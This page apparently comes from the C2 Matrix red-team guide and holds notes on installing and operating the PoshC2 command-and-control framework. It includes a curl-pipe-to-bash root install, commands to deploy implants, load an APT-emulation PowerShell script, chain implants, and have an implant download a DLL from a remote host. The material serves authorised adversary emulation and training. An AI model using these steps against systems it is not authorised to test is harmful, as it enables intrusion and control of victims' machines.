C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix Edition
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By GitBook
PoshC2
PoshC2 is pretty well documented, below are my notes. Best to use the official documentation: https://poshc2.readthedocs.io/en/latest/
Demo of PoshC2 is in this Red Team Village and Texas Cyber Summit June'gle event:

Install PoshC2

1
sudo su -
2
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
Copied!

Configure and Run PoshC2

1
sudo su -
2
cd /opt/PoshC2
3
posh-project -n test
4
posh-config
Copied!
Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent

Launch Server

1
sudo su -
2
posh-server
Copied!
On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.
1
cat /opt/PoshC2_Project/quickstart.txt
Copied!

Launch Handler

1
sudo su -
2
posh -u georgy
Copied!

Deploy Agent

Use the multitude of methods to deploy the agent from the quickstart.txt file.

Emulate TTPs

Run PowerShell Scripts

1
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1
2
detectav
3
software
Copied!

Chaining

Run the following command from the implant you want to use as the daisy server.
1
startdaisy
Copied!

Download a file

1
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
Copied!

Other Resources

C2 - Previous
Nuages
Next - C2
PowerHub
Last modified 10mo ago
Copy link
Contents
Install PoshC2
Configure and Run PoshC2
Launch Server
Launch Handler
Deploy Agent
Emulate TTPs
Run PowerShell Scripts
Chaining
Download a file
Other Resources